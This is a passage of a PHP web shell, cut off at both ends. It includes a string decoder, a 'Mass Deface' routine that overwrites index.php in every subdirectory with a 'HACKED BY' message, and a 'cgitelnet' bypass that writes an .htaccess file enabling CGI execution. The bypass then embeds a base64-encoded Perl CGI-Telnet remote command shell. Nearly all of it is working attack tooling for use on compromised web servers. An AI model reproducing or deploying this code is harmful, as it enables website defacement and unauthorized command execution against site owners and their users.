(isset($submit)){\r\n$op = $_POST["ope"];\r\nswitch ($op) {case \'base64\': $codi=base64_decode($text);\r\nbreak;case \'str\' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));\r\nbreak;case \'gzinflate\' : $codi=str_rot13(gzinflate(base64_decode($text)));\r\nbreak;default:break;}}\r\n\r\necho \'<textarea cols=80 rows=10 class="inputz" readonly>\'.$codi.\'</textarea></center><BR><BR>\';\r\n\r\n}\r\n\r\n/////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mass\'))\r\n{\r\necho "<center/><br/><b><font color=#00ff00>-=[ Mass Deface ]=-</font></b><br>";\r\nerror_reporting(0);?>\r\n<form ENCTYPE="multipart/form-data" action="<?php $_SERVER[\'PHP_SELF\']?>" method=\'post\'>\r\n<td><table><table class="tabnet" >\r\n<form hethot=\'post\'>\r\n<tr>\r\n\t<tr>\r\n\t<td>&nbsp;&nbsp;Folder</td><td><input class =\'inputz\' type=\'text\' name=\'path\' size=\'60\' value="<?php echo getcwd();?>"></td>\r\n\t</tr><br>\r\n\t<tr>\r\n\t<td>file name</td><td><input class =\'inputz\' type=\'text\' name=\'file\' size=\'60\' value="index.php"></td>\r\n\t</tr>\r\n</tr>\r\n<th colspan=\'2\'><b>Index code</b></th><br></table>\r\n<textarea style=\'background:black;outline:none;\' name=\'index\' rows=\'10\' cols=\'67\'>HACKED BY X\'1N73CT,PATCH YOUR SECURITY SYSTEM</textarea><br>\r\n<center><input class=\'inputzbut\' type=\'submit\' value="&nbsp;&nbsp;Deface&nbsp;&nbsp;"></center></form></table><br></form>\r\n\r\n<?php $mainpath=$_POST[path];$file=$_POST[file];$dir=opendir("$mainpath");$code=base64_encode($_POST[index]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$finish=@fwrite($start,$indx);if ($finish){echo "$row/$file > Done<br><br>";}}}\r\n\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'cgi\')) { \r\necho "<center/><br/><b><font color=blue>+--==[ cgitelnet.v1  Bypass Exploit]==--+ </font></b><br><br>";\r\n mkdir(\'cgitelnet1\', 0755);\r\n    chdir(\'cgitelnet1\');      \r\n        $kokdosya = ".htaccess";\r\n        $dosya_adi = "$kokdosya";\r\n        $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;&#305;lamad&#305;!");\r\n        $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI\r\n\r\nAddType application/x-httpd-cgi .cin\r\n\r\nAddHandler cgi-script .cin\r\nAddHandler cgi-script .cin";    \r\n        fwrite ( $dosya , $metin ) ;\r\n        fclose ($dosya);\r\n$cgishellizocin = \'IyEvdXNyL2Jpbi9wZXJsCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBDb3B5cmlnaHQgYW5kIExpY2VuY2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIENHSS1UZWxuZXQgVmVyc2lvbiAxLjAgZm9yIE5UIGFuZCBVbml4IDogUnVuIENvbW1hbmRzIG9uIHlvdXIgV2ViIFNlcnZlcgojCiMgQ29weXJpZ2h0IChDKSAyMDAxIFJvaGl0YWIgQmF0cmEKIyBQZXJtaXNzaW9uIGlzIGdyYW50ZWQgdG8gdXNlLCBkaXN0cmlidXRlIGFuZCBtb2RpZnkgdGhpcyBzY3JpcHQgc28gbG9uZwojIGFzIHRoaXMgY29weXJpZ2h0IG5vdGljZSBpcyBsZWZ0IGludGFjdC4gSWYgeW91IG1ha2UgY2hhbmdlcyB0byB0aGUgc2NyaXB0CiMgcGxlYXNlIGRvY3VtZW50IHRoZW0gYW5kIGluZm9ybSBtZS4gSWYgeW91IHdvdWxkIGxpa2UgYW55IGNoYW5nZXMgdG8gYmUgbWFkZQojIGluIHRoaXMgc2NyaXB0LCB5b3UgY2FuIGUtbWFpbCBtZS4KIwojIEF1dGhvcjogUm9oaXRhYiBCYXRyYQojIEF1dGhvciBlLW1haWw6IHJvaGl0YWJAcm9oaXRhYi5jb20KIyBBdXRob3IgSG9tZXBhZ2U6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vCiMgU2NyaXB0IEhvbWVwYWdlOiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL2NnaXNjcmlwdHMvY2dpdGVsbmV0Lmh0bWwKIyBQcm9kdWN0IFN1cHBvcnQ6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vc3VwcG9ydC8KIyBEaXNjdXNzaW9uIEZvcnVtOiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL2Rpc2N1c3MvCiMgTWFpbGluZyBMaXN0OiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL21saXN0LwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgSW5zdGFsbGF0aW9uCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUbyBpbnN0YWxsIHRoaXMgc2NyaXB0CiMKIyAxLiBNb2RpZnkgdGhlIGZpcnN0IGxpbmUgIiMhL3Vzci9iaW4vcGVybCIgdG8gcG9pbnQgdG8gdGhlIGNvcnJlY3QgcGF0aCBvbgojICAgIHlvdXIgc2VydmVyLiBGb3IgbW9zdCBzZXJ2ZXJzLCB5b3UgbWF5IG5vdCBuZWVkIHRvIG1vZGlmeSB0aGlzLgojIDIuIENoYW5nZSB0aGUgcGFzc3dvcmQgaW4gdGhlIENvbmZpZ3VyYXRpb24gc2VjdGlvbiBiZWxvdy4KIyAzLiBJZiB5b3UncmUgcnVubmluZyB0aGUgc2NyaXB0IHVuZGVyIFdpbmRvd3MgTlQsIHNldCAkV2luTlQgPSAxIGluIHRoZQojICAgIENvbmZpZ3VyYXRpb24gU2VjdGlvbiBiZWxvdy4KIyA0LiBVcGxvYWQgdGhlIHNjcmlwdCB0byBhIGRpcmVjdG9yeSBvbiB5b3VyIHNlcnZlciB3aGljaCBoYXMgcGVybWlzc2lvbnMgdG8KIyAgICBleGVjdXRlIENHSSBzY3JpcHRzLiBUaGlzIGlzIHVzdWFsbHkgY2dpLWJpbi4gTWFrZSBzdXJlIHRoYXQgeW91IHVwbG9hZAojICAgIHRoZSBzY3JpcHQgaW4gQVNDSUkgbW9kZS4KIyA1LiBDaGFuZ2UgdGhlIHBlcm1pc3Npb24gKENITU9EKSBvZiB0aGUgc2NyaXB0IHRvIDc1NS4KIyA2LiBPcGVuIHRoZSBzY3JpcHQgaW4geW91ciB3ZWIgYnJvd3Nlci4gSWYgeW91IHVwbG9hZGVkIHRoZSBzY3JpcHQgaW4KIyAgICBjZ2ktYmluLCB0aGlzIHNob3VsZCBiZSBodHRwOi8vd3d3LnlvdXJzZXJ2ZXIuY29tL2NnaS1iaW4vY2dpdGVsbmV0LnBsCiMgNy4gTG9naW4gdXNpbmcgdGhlIHBhc3N3b3JkIHRoYXQgeW91IHNwZWNpZmllZCBpbiBTdGVwIDIuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBDb25maWd1cmF0aW9uOiBZb3UgbmVlZCB0byBjaGFuZ2Ugb25seSAkUGFzc3dvcmQgYW5kICRXaW5OVC4gVGhlIG90aGVyCiMgdmFsdWVzIHNob3VsZCB3b3JrIGZpbmUgZm9yIG1vc3Qgc3lzdGVtcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQokUGFzc3dvcmQgPSAiMTIzNDU2IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4KCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2UgdGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZgoJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQKCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91CgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuCgokTlRDbWRTZXAgPSAiJiI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULgoKJFVuaXhDbWRTZXAgPSAiOyI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4LgoKJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gPSAxMDsJIyBUaW1lIGluIHNlY29uZHMgYWZ0ZXIgY29tbWFuZHMgd2lsbCBiZSBraWxsZWQKCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzCgkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkjIHRha2UgdmVyeSBsb25nIHRvIGV4ZWN1dGUsIGxpa2UgImZpbmQgLyIuCgkJCQkjIFRoaXMgaXMgdmFsaWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzCgkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4KCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRhIGlzIHNlbnQgdG8gdGhlCgkJCQkjIGJyb3dzZXIgYXMgc29vbiBhcyBpdCBpcyBvdXRwdXQsIG90aGVyd2lzZQoJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kCgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UKCQkJCSMgcGluZywgc28gdGhhdCB5b3UgY2FuIHNlZSB0aGUgb3V0cHV0IGFzIGl0CgkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4KCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISEKCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOwokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7CiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOwokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOwoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJzZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQKIyBwYXJzZXMgR0VULCBQT1NUIGFuZCBtdWx0aXBhcnQvZm9ybS1kYXRhIHRoYXQgaXMgdXNlZCBmb3IgdXBsb2FkaW5nIGZpbGVzLgojIFRoZSBmaWxlbmFtZSBpcyBzdG9yZWQgaW4gJGlueydmJ30gYW5kIHRoZSBkYXRhIGlzIHN0b3JlZCBpbiAkaW57J2ZpbGVkYXRhJ30uCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAkaW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YKIyB0aGUgdmFyaWFibGUuIE5vdGU6IE1vc3Qgb2YgdGhlIGNvZGUgaW4gdGhpcyBmdW5jdGlvbiBpcyB0YWtlbiBmcm9tIG90aGVyIENHSQojIHNjcmlwdHMuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFJlYWRQYXJzZSAKewoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsKCWxvY2FsICgkaSwgJGxvYywgJGtleSwgJHZhbCk7CgkKCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOwoKCWlmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIkdFVCIpCgl7CgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307Cgl9CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikKCXsKCQliaW5tb2RlKFNURElOKSBpZiAkTXVsdGlwYXJ0Rm9ybURhdGEgJiAkV2luTlQ7CgkJcmVhZChTVERJTiwgJGluLCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsKCX0KCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBkYXRhCglpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykKCXsKCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZlciB0byBSRkMxODY3IAoJCUBsaXN0ID0gc3BsaXQoLyRCb3VuZGFyeS8sICRpbik7IAoJCSRIZWFkZXJCb2R5ID0gJGxpc3RbMV07CgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOwoJCSRIZWFkZXIgPSAkYDsKCQkkQm9keSA9ICQnOwogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMgdGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlCgkJJGlueydmaWxlZGF0YSd9ID0gJEJvZHk7CgkJJEhlYWRlciA9fiAvZmlsZW5hbWU9XCIoLispXCIvOyAKCQkkaW57J2YnfSA9ICQxOyAKCQkkaW57J2YnfSA9fiBzL1wiLy9nOwoJCSRpbnsnZid9ID1+IHMvXHMvL2c7CgoJCSMgcGFyc2UgdHJhaWxlcgoJCWZvcigkaT0yOyAkbGlzdFskaV07ICRpKyspCgkJeyAKCQkJJGxpc3RbJGldID1+IHMvXi4rbmFtZT0kLy87CgkJCSRsaXN0WyRpXSA9fiAvXCIoXHcrKVwiLzsKCQkJJGtleSA9ICQxOwoJCQkkdmFsID0gJCc7CgkJCSR2YWwgPX4gcy8oXihcclxuXHJcbnxcblxuKSl8KFxyXG4kfFxuJCkvL2c7CgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7CgkJCSRpbnska2V5fSA9ICR2YWw7IAoJCX0KCX0KCWVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQoJewoJCUBpbiA9IHNwbGl0KC8mLywgJGluKTsKCQlmb3JlYWNoICRpICgwIC4uICQjaW4pCgkJewoJCQkkaW5bJGldID1+IHMvXCsvIC9nOwoJCQkoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOwoJCQkka2V5ID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsKCQkJJGlueyRrZXl9IC49ICR2YWw7CgkJfQoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIFBhZ2UgSGVhZGVyCiMgQXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludFBhZ2VIZWFkZXIKewoJJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7CgkkRW5jb2RlZEN1cnJlbnREaXIgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOwoJcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7CglwcmludCA8PEVORDsKPGh0bWw+CjxoZWFkPgo8dGl0bGU+Q0dJLVRlbG5ldCBWZXJzaW9uIDEuMDwvdGl0bGU+CiRIdG1sTWV0YUhlYWRlcgo8L2hlYWQ+Cjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5mb2N1cygpIiBiZ2NvbG9yPSIjMDAwMDAwIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1hcmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiPgo8dGFibGUgYm9yZGVyPSIxIiB3aWR0aD0iMTAwJSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIyIj4KPHRyPgo8dGQgYmdjb2xvcj0iI0MyQkZBNSIgYm9yZGVyY29sb3I9IiMwMDAwODAiIGFsaWduPSJjZW50ZXIiPgo8Yj48Zm9udCBjb2xvcj0iIzAwMDA4MCIgc2l6ZT0iMiI+IzwvZm9udD48L2I+PC90ZD4KPHRkIGJnY29sb3I9IiMwMDAwODAiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiIGNvbG9yPSIjRkZGRkZGIj48Yj5DR0ktVGVsbmV0IFZlcnNpb24gMS4wIC0gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9udD48L3RkPgo8L3RyPgo8dHI+Cjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjQzJCRkE1Ij48Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5EaXNjb25uZWN0PC9hPiB8CjxhIGhyZWY9Imh0dHA6Ly93d3cucm9oaXRhYi5jb20vY2dpc2NyaXB0cy9jZ2l0ZWxuZXQuaHRtbCI+SGVscDwvYT4KPC9mb250PjwvdGQ+CjwvdHI+CjwvdGFibGU+Cjxmb250IGNvbG9yPSIjQzBDMEMwIiBzaXplPSIzIj4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luU2NyZWVuCnsKCSRNZXNzYWdlID0gcSQ8cHJlPjxmb250IGNvbG9yPSIjNjY5OTk5Ij4gX19fX18gIF9fX19fICBfX19fXyAgICAgICAgICBfX19fXyAgICAgICAgXyAgICAgICAgICAgICAgIF8KLyAgX18gXHwgIF9fIFx8XyAgIF98ICAgICAgICB8XyAgIF98ICAgICAgfCB8ICAgICAgICAgICAgIHwgfAp8IC8gIFwvfCB8ICBcLyAgfCB8ICAgX19fX19fICAgfCB8ICAgIF9fXyB8IHwgXyBfXyAgICBfX18gfCB8Xwp8IHwgICAgfCB8IF9fICAgfCB8ICB8X19fX19ffCAgfCB8ICAgLyBfIFx8IHx8ICdfIFwgIC8gXyBcfCBfX3wKfCBcX18vXHwgfF9cIFwgX3wgfF8gICAgICAgICAgIHwgfCAgfCAgX18vfCB8fCB8IHwgfHwgIF9fL3wgfF8KIFxfX19fLyBcX19fXy8gXF9fXy8gICAgICAgICAgIFxfLyAgIFxfX198fF98fF98IHxffCBcX19ffCBcX198IDEuMAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAo8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPiAgICAgICAgICAgICAgICAgICAgICBfX19fX18gICAgICAgICAgICAgPC9mb250Pjxmb250IGNvbG9yPSIjQUU4MzAwIj7CqSAyMDAxLCBSb2hpdGFiIEJhdHJhPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4KICAgICAgICAgICAgICAgICAgIC4tJnF1b3Q7ICAgICAgJnF1b3Q7LS4KICAgICAgICAgICAgICAgICAgLyAgICAgICAgICAgIFwKICAgICAgICAgICAgICAgICB8ICAgICAgICAgICAgICB8CiAgICAgICAgICAgICAgICAgfCwgIC4tLiAgLi0uICAsfAogICAgICAgICAgICAgICAgIHwgKShfby8gIFxvXykoIHwKICAgICAgICAgICAgICAgICB8LyAgICAgL1wgICAgIFx8CiAgICAgICAoQF8gICAgICAgKF8gICAgIF5eICAgICBfKQogIF8gICAgICkgXDwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X19fX19fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+XDwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X188L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPnxJSUlJSUl8PC9mb250Pjxmb250IGNvbG9yPSIjODA4MDgwIj5fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+LzwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X19fX19fX19fX19fX19fX19fX19fX18KPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4gKF8pPC9mb250Pjxmb250IGNvbG9yPSIjODA4MDgwIj5AOEA4PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj57fTwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+Jmx0O19fX19fX19fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj58LVxJSUlJSUkvLXw8L2ZvbnQ+PGZvbnQgY29sb3I9IiM4MDgwODAiPl9fX19fX19fX19fX19fX19fX19fX19fXyZndDs8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPgogICAgICAgIClfLyAgICAgICAgXCAgICAgICAgICAvIAogICAgICAgKEAgICAgICAgICAgIGAtLS0tLS0tLWAKICAgICAgICAgICAgIDwvZm9udD48Zm9udCBjb2xvcj0iI0FFODMwMCI+VyBBIFIgTiBJIE4gRzogUHJpdmF0ZSBTZXJ2ZXI8L2ZvbnQ+PC9wcmU+CiQ7CiMnCglwcmludCA8PEVORDsKPGNvZGU+ClRyeWluZyAkU2VydmVyTmFtZS4uLjxicj4KQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPGJyPgpFc2NhcGUgY2hhcmFjdGVyIGlzIF5dCjxjb2RlPiRNZXNzYWdlCkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQp7CglwcmludCA8PEVORDsKPGNvZGU+Cjxicj5sb2dpbjogYWRtaW48YnI+CnBhc3N3b3JkOjxicj4KTG9naW4gaW5jb3JyZWN0PGJyPjxicj4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9naW5Gb3JtCnsKCXByaW50IDw8RU5EOwo8Y29kZT4KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+CmxvZ2luOiBhZG1pbjxicj4KcGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgo8L2NvZGU+CkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBmb290ZXIgZm9yIHRoZSBIVE1MIFBhZ2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRQYWdlRm9vdGVyCnsKCXByaW50ICI8L2ZvbnQ+PC9ib2R5PjwvaHRtbD4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNhbiBiZSBhY2Nlc3NlcyB1c2luZyB0aGUKIyB2YXJpYWJsZSAkQ29va2llc3snJ30KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9nb3V0U2NyZWVuCnsKCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3NlZ